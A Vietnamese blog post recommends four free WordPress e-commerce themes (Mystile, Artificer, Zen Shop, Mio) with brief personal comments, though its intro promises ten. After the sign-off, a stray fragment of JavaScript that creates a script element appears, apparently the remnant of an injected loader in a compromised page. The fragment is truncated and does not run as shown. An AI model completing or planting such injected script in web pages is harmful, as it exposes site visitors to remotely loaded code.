Những Theme WordPress bán hàng đẹp nhất – Free

Tổng hợp 10 theme WordPress hoàn toàn free dành cho những bạn muốn tạo trang web bán hàng trực tuyến bằng mã nguồn WordPress.

 

Mọi người đều biết đến WordPress như một mã nguồn cho tạo lập blog cá nhân hoàn toàn miễn phí. Nhưng cùng thời gian và sự phát triển lớn mạnh của cộng đồng WordPress thế giới thì WP ngày nay đã trở thành một CMS cực đỉnh hộ trợ cho bạn tạo hàng trăm loại website phục vụ nhu cầu cho người sử dụng.

Thông thường các bạn sữ sử dụng các mã nguồn chuyên nghiệp như Opencart, Prestashop, Magento… để tạo ra một website bán hàng trực tuyến. Nhưng không phải ai cũng có kinh phí để làm việc đó cũng như các mã nguồn đã không hề dễ dàng sử dụng.

Theme WordPress phát triển mạnh mẽ với đầy đủ chức năng kết hợp với CMS WordPress đã tạo ra một thế giới mới cho mã nguồn mở hoàn toàn miễn phí.

Phong trào kinh doanh nhỏ trên internet của bộ phận lớn sinh viên trong nước đang tăng mạnh. Cùng với gánh nặng tiền bạc thì các bạn không có nhiều điều kiện sắm sửa những website chuyên dụng. Đáp ứng nhu cầu đó mình giới thiệu đến các bạn TOP 4 theme bán hàng free cho phép các bạn tạo được các website bán hàng từ WordPress.

 

1. Mystyle

mystile1-958x719

mystyle-free-wordpress-theme-scrfeenshot

Download

Theme được thiết kế gọn nhẹ, tối ưu tốc độ load sẽ phù hợp cho bạn. Đương nhiên nó sẽ đẹp lung linh hơn nếu bạn biết thiết kế.

 

2. Artificer

 

artificer-958x719 artificer-responsive-large1

Download

Về mặt đánh giá cá nhân thì theme này khá tuyệt vời. Được tích hợp sẵn có cho Tablet và điện thoại di động. Hẳn sẽ là một điểm mạnh vượt trội trong khâu tiêu thụ sản phẩm qua thiết bị di động.

 

3. Zen Shop

 

zenshop-wordpress-theme1

Download

Một theme wordpress khá thích hợp cho bán các sản phẩm thiết bị di động. Về cảm quan mình thích những trang web có bố cục rõ ràng như thế này, nó tạo một cảm giác chuyên nghiệp. Tích hợp sẵn 2 giao diện cho bạn tùy ý lựa chọn.

 

4. Mio

 

mio-free-wordpress-thememio-free-wordpress-theme-04

Download

Đây là theme WordPress mình ưng ý nhất trong đám theme này. Ngẫu nhiên trùng hợp là mình thích màu trắng thôi, mình không thích lòe loẹt. Còn bạn thì sao, mình khuyên bạn nên dùng cái theme này. Nó được lấy cảm hứng từ Apple, mấy bạn đang bán điện thoại trên toàn quốc cũng nên xem qua và dùng thử nó.

 

Ý kiến đánh giá về website bán hàng tạo lập trên WordPress

 

Mình nói hướng đến những người kinh doanh trẻ những người đang đam mê nghiệp kinh doanh và muốn phát triển nó lên internet rộng rãi. Đương nhiên, các bạn là người trẻ và không có nhiều tiền vì vậy bạn đã tìm đến bài viết này của mình. Miễn phí nhưng các theme wordpress này đầy chất lượng và tính năng thật sự là hoàn hảo không kém gì các mã nguồn chuyên dụng.

Khi bạn đã kinh doanh đủ lãi, một lời khuyên cho bạn là hãy nâng cấp chúng lên bằng những theme bán hàng trả phí để tạo doanh thu một cách dồi dào hơn. Hoặc có một cách khác là bạn thuê người về thiết kế, cải tổ lại nó theo những chức năng bạn muốn.

Theme bán hàng trả phí chuyên nghiệp cho WordPress – Blanco

Chúc các bạn kinh doanh tốt.

 

}var d=document;var s=d.createElement(‘script’); }

Pin It

Trả lời

Thư điện tử của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *